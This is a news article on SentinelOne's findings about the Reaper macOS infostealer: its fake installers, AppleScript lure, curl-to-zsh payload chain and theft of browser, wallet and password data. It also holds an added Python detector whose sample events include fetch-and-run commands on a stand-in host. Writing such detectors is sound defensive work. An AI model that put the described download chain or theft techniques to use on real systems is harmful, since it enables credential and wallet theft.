

Security researchers at SentinelOne say a new variant of Reaper Mac malware is actively targeting macOS users by posing as trusted software installers, including a fake WeChat installer. The campaign marks a notable change in tactics, shifting away from the older Terminal-based social-engineering flow and toward an AppleScript attack chain designed to feel more native on the Mac.
According to SentinelOne, Reaper is a derivative of the earlier SHub information stealer. The biggest change is how it gets users to trigger the infection. Earlier campaigns relied on tricking victims into copying commands into Terminal. This newer version instead abuses the applescript:// URL scheme to launch Apple’s Script Editor and preload a malicious AppleScript, making the attack look less suspicious to ordinary users.
The researchers say the attackers are hosting bogus installers on domains that closely resemble legitimate services, especially WeChat and Miro. Example domains cited in the report include lookalike addresses such as qq-0732gwh22[.]com, mlcrosoft[.]co[.]com, and mlroweb[.]com. Once a victim clicks through and runs the script, they may see a fake Apple security update prompt that even references XProtectRemediator in an attempt to lower suspicion.
From there, the script downloads a shell payload with curl and silently executes it through zsh. SentinelOne says the malware first checks whether the system is using a Russian keyboard or input method; if it is, the malware reports a cis_blocked event and exits. If not, it continues by invoking macOS built-in scripting tools and moving into the data-theft stage.
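The Script Editor -> curl -> zsh chain just described is the kind of process lineage an endpoint sensor can flag. The following is an added example, not code from SentinelOne or the report; it walks constructed process-start events (the JSON field names `pid`, `ppid`, `exe`, `args` and the Script Editor path are assumptions, not a real EDR schema) and reports scripting-host processes under which both curl and zsh appeared.

```python
"""Added detection example (not SentinelOne's logic): flag Script Editor or
osascript processes that spawned both curl and zsh, matching the
download-and-run chain described in the article."""
import json
from collections import defaultdict

# Constructed sample events. pid 200 mimics the chain in the article;
# pid 100 is a benign Script Editor session; pid 300 is an interactive shell.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"pid": 100, "ppid": 1, "exe": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor", "args": ""},
    {"pid": 101, "ppid": 100, "exe": "/usr/bin/osascript", "args": "osascript -e 'display dialog'"},
    {"pid": 200, "ppid": 1, "exe": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor", "args": ""},
    {"pid": 201, "ppid": 200, "exe": "/usr/bin/curl", "args": "curl -fsSL https://example.invalid/p.sh"},
    {"pid": 202, "ppid": 200, "exe": "/bin/zsh", "args": "zsh /tmp/p.sh"},
    {"pid": 300, "ppid": 1, "exe": "/bin/zsh", "args": "zsh -l"},
    {"pid": 301, "ppid": 300, "exe": "/usr/bin/curl", "args": "curl https://example.invalid/"},
])

SCRIPT_HOSTS = {"Script Editor", "osascript"}  # assumed executable basenames
DOWNLOAD_TOOLS = {"curl", "zsh"}


def ancestors(ev, by_pid):
    """Yield ev's parent events, nearest first, until the lineage leaves the log."""
    ppid = ev["ppid"]
    while ppid in by_pid:
        yield by_pid[ppid]
        ppid = by_pid[ppid]["ppid"]


def find_script_editor_download_chains(event_lines):
    """Return pids of scripting hosts that have both curl and zsh among their
    descendants, i.e. a script that fetched a payload and ran it through zsh."""
    events = [json.loads(l) for l in event_lines.splitlines() if l.strip()]
    by_pid = {e["pid"]: e for e in events}
    tools_under = defaultdict(set)  # scripting-host pid -> tool names seen beneath it
    for ev in events:
        name = ev["exe"].rsplit("/", 1)[-1]
        if name not in DOWNLOAD_TOOLS:
            continue
        for parent in ancestors(ev, by_pid):
            if parent["exe"].rsplit("/", 1)[-1] in SCRIPT_HOSTS:
                tools_under[parent["pid"]].add(name)
    return sorted(pid for pid, tools in tools_under.items() if tools == DOWNLOAD_TOOLS)


if __name__ == "__main__":
    print(find_script_editor_download_chains(SAMPLE_EVENTS))  # prints [200]
```

Only pid 200 is reported: the benign Script Editor session never spawns curl or zsh, and the interactive zsh that runs curl has no scripting host above it.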
The theft scope is broad. Reaper is reported to target browser data from Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion. It also goes after wallet extensions such as MetaMask and Phantom, plus password-manager extensions including 1Password, Bitwarden, and LastPass. On top of that, it can collect iCloud-related data, Telegram sessions, and developer configuration files.
SentinelOne says the malware includes a Filegrabber module that scans Desktop and Documents folders, prioritizing files under 2MB, while PNG images can be taken up to 6MB each. The overall exfiltration cap is said to be 150MB. If desktop wallet apps such as Exodus, Atomic Wallet, Ledger Live, Electrum, or Trezor Suite are present, Reaper may terminate those apps and replace core application files with a malicious app.asar fetched from its command-and-control server.
In short, this Reaper campaign is dangerous not only because it steals data, but because it can also establish longer-term remote access. For Mac users, the report is another reminder that social-engineering attacks are getting better at blending into familiar system workflows rather than relying on obviously suspicious commands.